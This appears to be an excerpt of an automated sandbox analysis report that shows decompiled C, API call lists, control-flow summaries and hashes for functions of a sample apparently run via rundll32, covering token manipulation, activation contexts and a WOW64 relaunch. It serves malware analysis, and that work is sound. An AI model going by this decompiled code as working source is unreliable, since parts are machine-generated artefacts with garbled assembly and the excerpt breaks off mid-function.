                                                  0x0004123e
                                                  0x0004123f
                                                  0x0004124a
                                                  0x00041250
                                                  0x00041255
                                                  0x00041355
                                                  0x00041356
                                                  0x00041356
                                                  0x00041267
                                                  0x0004128d
                                                  0x00041290
                                                  0x000424d8
                                                  0x00041296
                                                  0x0004129b
                                                  0x000412a9
                                                  0x000412ac
                                                  0x000412b2
                                                  0x000412b5
                                                  0x000412ba
                                                  0x000412bc
                                                  0x000424c8
                                                  0x000412c2
                                                  0x000412d1
                                                  0x000412d7
                                                  0x000412e3
                                                  0x000412e8
                                                  0x000412ed
                                                  0x000412f1
                                                  0x000421db
                                                  0x000421db
                                                  0x000412fa
                                                  0x00041312
                                                  0x00041321
                                                  0x00041328
                                                  0x0004132b
                                                  0x0004132b
                                                  0x00041334
                                                  0x00041334
                                                  0x0004133b
                                                  0x0004133b
                                                  0x00041347
                                                  0x00041347
                                                  0x00041290
                                                  0x0004134f
                                                  0x00000000

                                                  APIs
                                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00045068,00000001,00000000), ref: 00041217
                                                  • NtSetInformationProcess.NTDLL ref: 0004122A
                                                  • lstrlenW.KERNEL32(?), ref: 00041233
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 0004124A
                                                  • SetErrorMode.KERNELBASE(00008001,?,?,?,?,?,00000000,00000001,?), ref: 0004129B
                                                    • Part of subcall function 00041E56: GetFileAttributesW.KERNELBASE(?,00000000,00000001,00000001), ref: 00041E7F
                                                    • Part of subcall function 00041E56: lstrlenW.KERNEL32(?), ref: 00041ECA
                                                    • Part of subcall function 00041E56: GetFileAttributesW.KERNELBASE(?,?,00000104,.manifest), ref: 00041EF5
                                                    • Part of subcall function 00041E56: CreateActCtxW.KERNEL32(00000020), ref: 00041F31
                                                    • Part of subcall function 00041E56: CreateActCtxW.KERNEL32(00000020), ref: 00041F4F
                                                    • Part of subcall function 00041E56: CreateActCtxW.KERNEL32(00000020), ref: 00041F69
                                                    • Part of subcall function 00041E56: GetModuleHandleW.KERNEL32(00000000), ref: 00041FA3
                                                    • Part of subcall function 00041E56: CreateActCtxW.KERNEL32(00000000), ref: 00041FC0
                                                    • Part of subcall function 00041E56: ActivateActCtx.KERNEL32(00000000,?), ref: 00041FCD
                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,00000000,?,?,00000001), ref: 0004133B
                                                    • Part of subcall function 00041467: RtlImageNtHeader.NTDLL(?), ref: 0004147A
                                                    • Part of subcall function 00041467: ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,00000001,?,?,000412FF,00000001,?,?,?,00000001,?,?,00000000,?), ref: 0004149C
                                                    • Part of subcall function 000413B9: LoadIconW.USER32 ref: 000413E3
                                                    • Part of subcall function 000413B9: LoadCursorW.USER32 ref: 000413F2
                                                    • Part of subcall function 000413B9: RegisterClassW.USER32 ref: 00041413
                                                    • Part of subcall function 000413B9: CreateWindowExW.USER32 ref: 00041432
                                                  • DestroyWindow.USER32 ref: 0004132B
                                                  • FreeLibrary.KERNEL32(00000001,?,00000000,?,?,RunDLL,00000001,?,?,?,00000001,?,?,00000000,?,?), ref: 00041334
                                                  • LocalFree.KERNEL32(?,00000000,00000001,?), ref: 0004134F
                                                  • ExitProcess.KERNEL32 ref: 00041356
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Create$FreeLocal$AttributesFileImageInformationLoadProcessWindowlstrlen$ActivateAllocClassCursorDataDestroyDirectoryEntryErrorExitHandleHeaderHeapIconLibraryModeModuleRegister
                                                  • String ID: RunDLL$requestedRunLevel
                                                  • API String ID: 1179100334-3494409908
                                                  • Opcode ID: 11995ecdbae17008b2ae548166e607f367664a0cfcc8911c18cd08c3ca958497
                                                  • Instruction ID: 8acc38ae27a96280afcf1ba986d0feef30cbd0fb521348ed4e8fe71e57bcbf06
                                                  • Opcode Fuzzy Hash: 11995ecdbae17008b2ae548166e607f367664a0cfcc8911c18cd08c3ca958497
                                                  • Instruction Fuzzy Hash: A34129F9800249FBDF11AFA0DD45DEE7FB9FF49341B104125FA11A1062D7758A909BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000414BD Relevance: 7.6, APIs: 5, Instructions: 78libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 180 414bd-414f5 LoadLibraryExW 181 423fc-42409 GetLastError 180->181 182 414fb-41504 RtlImageNtHeader 180->182 183 4243f-4244f 181->183 184 4240b-4240c call 439e5 181->184 185 41506-4150f 182->185 186 41519 182->186 189 42454-4245c FormatMessageW 183->189 192 42411-42413 184->192 185->186 190 41511-41513 SetProcessDEPPolicy 185->190 187 4151f-4152d call 41189 186->187 189->186 193 42462-4247a call 4389e 189->193 190->186 195 42415-42417 192->195 196 4241c-4243d 192->196 193->186 195->187 196->189
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008,00000000,00000000,00000001), ref: 000414E7
                                                  • RtlImageNtHeader.NTDLL(00000000), ref: 000414FC
                                                  • SetProcessDEPPolicy.KERNEL32(00000003), ref: 00041513
                                                  • GetLastError.KERNEL32 ref: 000423FC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeaderImageLastLibraryLoadPolicyProcess
                                                  • String ID:
                                                  • API String ID: 1237969533-0
                                                  • Opcode ID: 4bd27df8d08a7472ce0620ec1824d8165e371b72b7b535899790f2d5a18445d5
                                                  • Instruction ID: ecf908c1b33cb343e9229699cb265155f71988ea072e503f0a4a247bd0abc636
                                                  • Opcode Fuzzy Hash: 4bd27df8d08a7472ce0620ec1824d8165e371b72b7b535899790f2d5a18445d5
                                                  • Instruction Fuzzy Hash: B42180F5A40218BFEB20DB60CD89FEA77ADEB45344F500475F605D2191DAB48EC88A64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000419E3 Relevance: 4.5, APIs: 3, Instructions: 48nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 209 419e3-41a00 call 41a33 212 41a27-41a2b 209->212 213 41a02-41a06 209->213 213->212 214 41a08-41a1a call 420b4 213->214 217 41a20-41a21 214->217 218 42108-4211b NtOpenProcessToken 214->218 217->212 219 42383-42385 217->219 218->212 220 42121-42142 NtSetInformationToken NtClose 218->220 219->212 220->212
                                                  C-Code - Quality: 36%
                                                  			E000419E3(void* __ecx, void* __eflags, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t16;
				signed int _t21;
				void** _t22;
				void* _t28;

				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t16 = E00041A33(__ecx,  &_v8); // executed
				_t28 = _t16;
				if(_t28 != 0 && _v8 == 0) {
					E000420B4(_a4,  &_v12);
					_t21 = _v12;
					if(_t21 == 0) {
						_t22 =  &_a4;
						__imp__NtOpenProcessToken(0xffffffff, 0x80, _t22);
						if(_t22 >= 0) {
							_v12 = 1;
							__imp__NtSetInformationToken(_a4, 0x18,  &_v12, 4);
							NtClose(_a4);
						}
					} else {
						if(_t21 != 1) {
							_t28 = 0;
						}
					}
				}
				return _t28;
			}









                                                  0x000419e8
                                                  0x000419e9
                                                  0x000419ea
                                                  0x000419ee
                                                  0x000419f7
                                                  0x000419fc
                                                  0x00041a00
                                                  0x00041a0f
                                                  0x00041a17
                                                  0x00041a1a
                                                  0x00042108
                                                  0x00042113
                                                  0x0004211b
                                                  0x0004212c
                                                  0x00042133
                                                  0x0004213c
                                                  0x0004213c
                                                  0x00041a20
                                                  0x00041a21
                                                  0x00042383
                                                  0x00042383
                                                  0x00041a21
                                                  0x00041a1a
                                                  0x00041a2b

                                                  APIs
                                                    • Part of subcall function 00041A33: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00041A4B
                                                    • Part of subcall function 00041A33: NtClose.NTDLL ref: 00041A6E
                                                    • Part of subcall function 000420B4: QueryActCtxW.KERNEL32(80000000,000000FF,00000000,00000005,?,0000000C,00000000), ref: 000420E4
                                                  • NtOpenProcessToken.NTDLL(000000FF,00000080,00000000), ref: 00042113
                                                  • NtSetInformationToken.NTDLL ref: 00042133
                                                  • NtClose.NTDLL ref: 0004213C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseOpenProcess$InformationQuery
                                                  • String ID:
                                                  • API String ID: 1146784981-0
                                                  • Opcode ID: f8c859e13efbdb1d1435039ac2c94e2b267d1032adcc57caa924eb3f10f3a407
                                                  • Instruction ID: 0b4c69ab4bc7c982a75ac024f30d4ad3f354e1945b83ba643448ca3da09ebfee
                                                  • Opcode Fuzzy Hash: f8c859e13efbdb1d1435039ac2c94e2b267d1032adcc57caa924eb3f10f3a407
                                                  • Instruction Fuzzy Hash: 1401BCF6600208BBEB109FD4CC09BEE7AB8EB51351F504174B610D62A0D7749BC4CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00041A8C Relevance: 3.1, APIs: 2, Instructions: 53nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 221 41a8c-41ac0 NtQueryInformationToken 222 41ad5-41ad9 221->222 223 41ac2-41ac6 221->223 224 421e3-421e8 223->224 225 41acc-41acf 223->225 224->222 225->222 226 42362-42378 NtQueryInformationToken 225->226 227 421ed-421f1 226->227 228 4237e 226->228 227->224 229 421f3 227->229 228->222 229->222
                                                  APIs
                                                  • NtQueryInformationToken.NTDLL ref: 00041ABC
                                                  • NtQueryInformationToken.NTDLL ref: 00042374
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: InformationQueryToken
                                                  • String ID:
                                                  • API String ID: 4239771691-0
                                                  • Opcode ID: dc0adf43f05368ca026045bb25f77f3cab9587e45f4603985a44fdb258ac0f6f
                                                  • Instruction ID: 3856091163608c359e9f9114945b1648ca1b44f9021ac7ece2db20e8f97448d5
                                                  • Opcode Fuzzy Hash: dc0adf43f05368ca026045bb25f77f3cab9587e45f4603985a44fdb258ac0f6f
                                                  • Instruction Fuzzy Hash: 0F118CB2601218FBEB21CF85CC40FEEB7BCEB59760F514066FA10D6160D3709A51DBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00041A33 Relevance: 3.0, APIs: 2, Instructions: 39nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 230 41a33-41a53 NtOpenProcessToken 231 41a55-41a64 call 41a8c 230->231 232 41a7f-41a84 230->232 234 41a69-41a77 NtClose 231->234 234->232 235 41a79-41a7e 234->235 235->232
                                                  C-Code - Quality: 58%
                                                  			E00041A33(void* __ecx, void* _a4) {
				char _v8;
				char _v12;
				void** _t9;
				void* _t13;
				void* _t20;
				char _t21;
				void* _t23;
				intOrPtr* _t24;

				_t24 = _a4;
				_t9 =  &_a4;
				_t21 = 0;
				 *_t24 = 0;
				__imp__NtOpenProcessToken(0xffffffff, 8, _t9, _t20, _t23, __ecx, __ecx);
				if(_t9 >= 0) {
					_v8 = 0;
					_t13 = E00041A8C(__ecx, _a4,  &_v8,  &_v12); // executed
					NtClose(_a4);
					if(_t13 >= 0) {
						 *_t24 = _v8;
						_t21 = 1;
					}
				}
				return _t21;
			}











                                                  0x00041a3b
                                                  0x00041a3f
                                                  0x00041a45
                                                  0x00041a49
                                                  0x00041a4b
                                                  0x00041a53
                                                  0x00041a61
                                                  0x00041a64
                                                  0x00041a6e
                                                  0x00041a77
                                                  0x00041a7c
                                                  0x00041a7e
                                                  0x00041a7e
                                                  0x00041a77
                                                  0x00041a84

                                                  APIs
                                                  • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00041A4B
                                                    • Part of subcall function 00041A8C: NtQueryInformationToken.NTDLL ref: 00041ABC
                                                  • NtClose.NTDLL ref: 00041A6E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery
                                                  • String ID:
                                                  • API String ID: 65470678-0
                                                  • Opcode ID: 148d8cb120c3c26bb31ab2f81411e0767cefb2bb071fc00880a2be374f842c2d
                                                  • Instruction ID: e7cf984022285455b2cda096bcf95bd0edadacd26529563b533471daf50038dd
                                                  • Opcode Fuzzy Hash: 148d8cb120c3c26bb31ab2f81411e0767cefb2bb071fc00880a2be374f842c2d
                                                  • Instruction Fuzzy Hash: D1F06DBA600248BBDB009F95CC84DEF7BADEB95360B104126BA51D3250D670DB849B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00041E56 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 127stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E00041E56(void* __ecx, WCHAR* _a4, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				short _v528;
				intOrPtr* _v532;
				intOrPtr _v544;
				WCHAR* _v556;
				signed int _v560;
				signed int _v564;
				WCHAR* _v568;
				struct HINSTANCE__* _v572;
				signed int _v580;
				char _v596;
				signed int _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				long _t42;
				WCHAR* _t46;
				void* _t49;
				signed int _t51;
				signed int _t54;
				signed int _t56;
				signed int _t58;
				WCHAR* _t60;
				void* _t63;
				long _t65;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				WCHAR* _t77;
				void* _t78;
				long _t79;
				signed int _t80;

				_v8 =  *0x45040 ^ _t80;
				_t41 = _a8;
				_t77 = _a4;
				_t70 = 0;
				_v532 = _t41;
				 *_t41 = 0; // executed
				_t42 = GetFileAttributesW(_t77); // executed
				_t79 = 0x104;
				if(_t42 == 0xffffffff) {
					if(SearchPathW(0, _t77, 0, 0x104,  &_v528,  &_v568) != 0) {
						L2:
						_v560 = _v560 & 0x00000000;
						_t46 =  &_v528;
						_t70 = _t70 | 0xffffffff;
						_v564 = 0x20;
						_v556 = _t46;
						_t77 = lstrlenW(_t46);
						_t49 = E00042001( &_v528, _t79, L".manifest");
						_t79 = __imp__CreateActCtxW;
						if(_t49 >= 0) {
							_t65 = GetFileAttributesW( &_v528); // executed
							if(_t65 != _t70) {
								_t70 =  *_t79( &_v564);
							}
						}
						 *((short*)(_t80 + _t77 * 2 - 0x20c)) = 0;
						if(_t70 != 0xffffffff) {
							L14:
							_push(_v532);
							_push(_t70);
							goto L11;
						} else {
							_v560 = 8;
							_v544 = 0x7b;
							_t54 =  *_t79( &_v564); // executed
							_t70 = _t54;
							if(_t70 != 0xffffffff) {
								goto L14;
							}
							_v544 = 0x7c;
							_t56 =  *_t79( &_v564); // executed
							_t70 = _t56;
							if(_t70 != 0xffffffff) {
								L12:
								_t51 = _t70;
								L13:
								return E00041189(_t51, _t70, _v8 ^ _t80, _t76, _t77, _t79);
							}
							_v544 = 2;
							_t58 =  *_t79( &_v564); // executed
							_t70 = _t58;
							if(_t70 != 0xffffffff) {
								goto L14;
							}
							if(_a12 == 0) {
								goto L12;
							}
							_v600 = _v600 & 0x00000000;
							_t76 = 7;
							_t74 = _t76;
							_t78 =  &_v596;
							_t60 = memset(_t78, 0, _t74 << 2);
							_t77 = _t78 + _t74;
							_v596 = 0x88;
							_v580 = _t76;
							_v572 = GetModuleHandleW(_t60);
							_v600 = 0x20;
							_t63 =  *_t79( &_v600);
							if(_t63 == _t70) {
								goto L12;
							}
							_push(_v532);
							_push(_t63);
							L11:
							__imp__ActivateActCtx();
							goto L12;
						}
					}
					L16:
					_t51 = 0;
					goto L13;
				}
				if(E00041AE1( &_v528, 0x104, _t77) < 0) {
					goto L16;
				}
				goto L2;
			}




































                                                  0x00041e68
                                                  0x00041e6b
                                                  0x00041e71
                                                  0x00041e74
                                                  0x00041e77
                                                  0x00041e7d
                                                  0x00041e7f
                                                  0x00041e85
                                                  0x00041e8d
                                                  0x00042355
                                                  0x00041ea9
                                                  0x00041ea9
                                                  0x00041eb0
                                                  0x00041eb7
                                                  0x00041eba
                                                  0x00041ec4
                                                  0x00041ed5
                                                  0x00041edf
                                                  0x00041ee4
                                                  0x00041eec
                                                  0x00041ef5
                                                  0x00041efd
                                                  0x00042621
                                                  0x00042621
                                                  0x00041efd
                                                  0x00041f05
                                                  0x00041f10
                                                  0x000420fc
                                                  0x000420fc
                                                  0x00042102
                                                  0x00000000
                                                  0x00041f16
                                                  0x00041f1d
                                                  0x00041f27
                                                  0x00041f31
                                                  0x00041f33
                                                  0x00041f38
                                                  0x00000000
                                                  0x00000000
                                                  0x00041f45
                                                  0x00041f4f
                                                  0x00041f51
                                                  0x00041f56
                                                  0x00041fd3
                                                  0x00041fd3
                                                  0x00041fd5
                                                  0x00041fe3
                                                  0x00041fe3
                                                  0x00041f5f
                                                  0x00041f69
                                                  0x00041f6b
                                                  0x00041f70
                                                  0x00000000
                                                  0x00000000
                                                  0x00041f7a
                                                  0x00000000
                                                  0x00000000
                                                  0x00041f7c
                                                  0x00041f85
                                                  0x00041f88
                                                  0x00041f8a
                                                  0x00041f90
                                                  0x00041f90
                                                  0x00041f93
                                                  0x00041f9d
                                                  0x00041fa9
                                                  0x00041fb6
                                                  0x00041fc0
                                                  0x00041fc4
                                                  0x00000000
                                                  0x00000000
                                                  0x00041fc6
                                                  0x00041fcc
                                                  0x00041fcd
                                                  0x00041fcd
                                                  0x00000000
                                                  0x00041fcd
                                                  0x00041f10
                                                  0x0004235b
                                                  0x0004235b
                                                  0x00000000
                                                  0x0004235b
                                                  0x00041ea3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00000000,00000001,00000001), ref: 00041E7F
                                                  • lstrlenW.KERNEL32(?), ref: 00041ECA
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000104,.manifest), ref: 00041EF5
                                                  • CreateActCtxW.KERNEL32(00000020), ref: 00041F31
                                                  • CreateActCtxW.KERNEL32(00000020), ref: 00041F4F
                                                  • CreateActCtxW.KERNEL32(00000020), ref: 00041F69
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00041FA3
                                                  • CreateActCtxW.KERNEL32(00000000), ref: 00041FC0
                                                  • ActivateActCtx.KERNEL32(00000000,?), ref: 00041FCD
                                                  • SearchPathW.KERNEL32 ref: 0004234D
                                                  • CreateActCtxW.KERNEL32(00000020), ref: 0004261F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Create$AttributesFile$ActivateHandleModulePathSearchlstrlen
                                                  • String ID: $ $.manifest$P4Uu0TUu$|
                                                  • API String ID: 833452776-189316523
                                                  • Opcode ID: 0f812060c7d1669e66bd82a5e94ca940156c2d15139c6a26618b0cf282b50f12
                                                  • Instruction ID: 03b94a76ed1ebb5eb9c03c7494443654536ee43109aada0e812846b952b542b9
                                                  • Opcode Fuzzy Hash: 0f812060c7d1669e66bd82a5e94ca940156c2d15139c6a26618b0cf282b50f12
                                                  • Instruction Fuzzy Hash: 62416FB59002189BDB20DFA4DD8CBDEB7F8AB49324F1006B5E119D2191D7789AC8CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000439D0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 132processsynchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 44%
                                                  			E000439D0(intOrPtr __eax, signed int __ebx, char __edx, void* __eflags) {
				intOrPtr _v0;
				signed int _v4;
				signed int _v12;
				short _v528;
				struct _SECURITY_ATTRIBUTES* _v532;
				struct _PROCESS_INFORMATION _v548;
				struct _STARTUPINFOW _v616;
				void* __edi;
				void* __esi;
				intOrPtr _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t35;
				void* _t36;
				int _t48;
				long _t50;
				void* _t57;
				signed int _t60;
				void* _t64;
				void* _t69;
				void* _t70;
				intOrPtr* _t71;
				signed int _t73;
				signed int _t75;

				_t62 = __edx;
				_t56 = __ebx;
				_t26 = __eax;
				asm("loopne 0xffffffbf");
				asm("in al, 0xfc");
				_push(0x8e4b804b);
				asm("pushfd");
				if(__eflags != 0) {
					 *(__edx + 0x73) =  *(__edx + 0x73) ^ __ebx;
					 *((char*)(__eax - 0x6f6f6f70)) = __edx;
					_push(_t73);
					_t73 = _t75;
					_t75 = _t75 - 0x268;
					_v12 =  *0x45040 ^ _t73;
					_t26 = _v0;
					_push(__ebx);
					_t56 = 0;
				}
				_v532 = _t56;
				_t27 = E000429B3(_t26); // executed
				_t69 = _t27;
				_t29 = GetCurrentProcess();
				__imp__IsWow64Process(_t29,  &_v532);
				if(_t29 == 0 || _v532 == _t56) {
					L14:
					_t30 = 0;
					__eflags = 0;
				} else {
					_t60 = 8;
					_v616.dwXCountChars = _t56;
					memset( &(_v616.dwYCountChars), 0, _t60 << 2);
					__imp__GetNativeSystemInfo( &(_v616.dwXCountChars)); // executed
					_t35 = 9;
					if(_t35 != _v616.dwXCountChars || _t69 == 0x8664) {
						_t36 = 6;
						if(_t36 != _v616.dwXCountChars || _t69 == 0x200) {
							if(GetSystemDirectoryW( &_v528, 0xf6) == 0 || E0004384E( &_v528, 0x105, L"rundll32.exe", _t56) < 0) {
								goto L14;
							} else {
								_t71 = __imp__Wow64EnableWow64FsRedirection;
								 *_t71(_t56);
								memset( &(_v616.lpReserved), _t56, 0x40);
								_v616.cb = 0x44;
								_t48 = CreateProcessW( &_v528, GetCommandLineW(), _t56, _t56, _t56, _t56, _t56, _t56,  &_v616,  &_v548); // executed
								if(_t48 == 0) {
									goto L14;
								} else {
									 *_t71(1);
									_t50 = WaitForSingleObject(_v548.hProcess, 0xffffffff);
									CloseHandle(_v548);
									CloseHandle(_v548.hThread);
									if(_t50 != _t56) {
										goto L14;
									} else {
										_t30 = 1;
									}
								}
							}
						} else {
							goto L14;
						}
					} else {
						goto L14;
					}
				}
				_pop(_t64);
				_pop(_t70);
				_pop(_t57);
				return E00041189(_t30, _t57, _v4 ^ _t73, _t62, _t64, _t70);
			}




























                                                  0x000439d0
                                                  0x000439d0
                                                  0x000439d0
                                                  0x000439d0
                                                  0x000439d2
                                                  0x000439d4
                                                  0x000439d9
                                                  0x000439da
                                                  0x000439dc
                                                  0x000439df
                                                  0x000439e7
                                                  0x000439e8
                                                  0x000439ea
                                                  0x000439f7
                                                  0x000439fa
                                                  0x000439fd
                                                  0x00043a00
                                                  0x00043a00
                                                  0x00043a03
                                                  0x00043a09
                                                  0x00043a0e
                                                  0x00043a17
                                                  0x00043a1e
                                                  0x00043a26
                                                  0x00043b45
                                                  0x00043b45
                                                  0x00043b45
                                                  0x00043a38
                                                  0x00043a3a
                                                  0x00043a3d
                                                  0x00043a49
                                                  0x00043a52
                                                  0x00043a5a
                                                  0x00043a62
                                                  0x00043a72
                                                  0x00043a7a
                                                  0x00043a9c
                                                  0x00000000
                                                  0x00043ac1
                                                  0x00043ac1
                                                  0x00043ac8
                                                  0x00043ad4
                                                  0x00043af0
                                                  0x00043b08
                                                  0x00043b10
                                                  0x00000000
                                                  0x00043b12
                                                  0x00043b14
                                                  0x00043b1e
                                                  0x00043b32
                                                  0x00043b3a
                                                  0x00043b3e
                                                  0x00000000
                                                  0x00043b40
                                                  0x00043b42
                                                  0x00043b42
                                                  0x00043b3e
                                                  0x00043b10
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00043a62
                                                  0x00043b4a
                                                  0x00043b4b
                                                  0x00043b4e
                                                  0x00043b55

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,00042411,000000C1,?,00000000), ref: 00043A17
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00043A1E
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00043A52
                                                  • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00043A94
                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00043AC8
                                                  • memset.MSVCRT ref: 00043AD4
                                                  • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00043AFA
                                                  • CreateProcessW.KERNEL32(?,00000000), ref: 00043B08
                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00043B14
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00043B1E
                                                  • CloseHandle.KERNEL32(?), ref: 00043B32
                                                  • CloseHandle.KERNEL32(?), ref: 00043B3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Wow64$Process$CloseEnableHandleRedirectionSystem$CommandCreateCurrentDirectoryInfoLineNativeObjectSingleWaitmemset
                                                  • String ID: D$rundll32.exe
                                                  • API String ID: 233067003-895393680
                                                  • Opcode ID: 8b1f1d922cdf868e23b8c3725cc48eec18cb7479fe37179663aa5f26c47a7ad6
                                                  • Instruction ID: f77027fd4d7eef2bb13d4c4469d761abcde6f77478641bea6d5b6fb7b7be704a
                                                  • Opcode Fuzzy Hash: 8b1f1d922cdf868e23b8c3725cc48eec18cb7479fe37179663aa5f26c47a7ad6
                                                  • Instruction Fuzzy Hash: BA41A6F6940219ABDB60ABA0DD4DBDEB7B8EB14710F0044B6E609E7151DB748EC4CF68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000439E5 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 112processsynchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 65%
                                                  			E000439E5(void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v532;
				char _v536;
				struct _PROCESS_INFORMATION _v552;
				struct _STARTUPINFOW _v620;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				intOrPtr* _t26;
				void* _t28;
				void* _t29;
				void* _t34;
				void* _t35;
				int _t47;
				long _t49;
				signed int _t56;
				void* _t58;
				void* _t60;
				intOrPtr* _t61;
				signed int _t62;

				_t58 = __edx;
				_v8 =  *0x45040 ^ _t62;
				_t25 = _a4;
				_v536 = 0;
				_t26 = E000429B3(_t25); // executed
				_t61 = _t26;
				_t28 = GetCurrentProcess();
				__imp__IsWow64Process(_t28,  &_v536);
				if(_t28 == 0 || _v536 == 0) {
					L12:
					_t29 = 0;
				} else {
					_t56 = 8;
					_v620.dwXCountChars = 0;
					_t60 =  &(_v620.dwYCountChars);
					memset(_t60, 0, _t56 << 2);
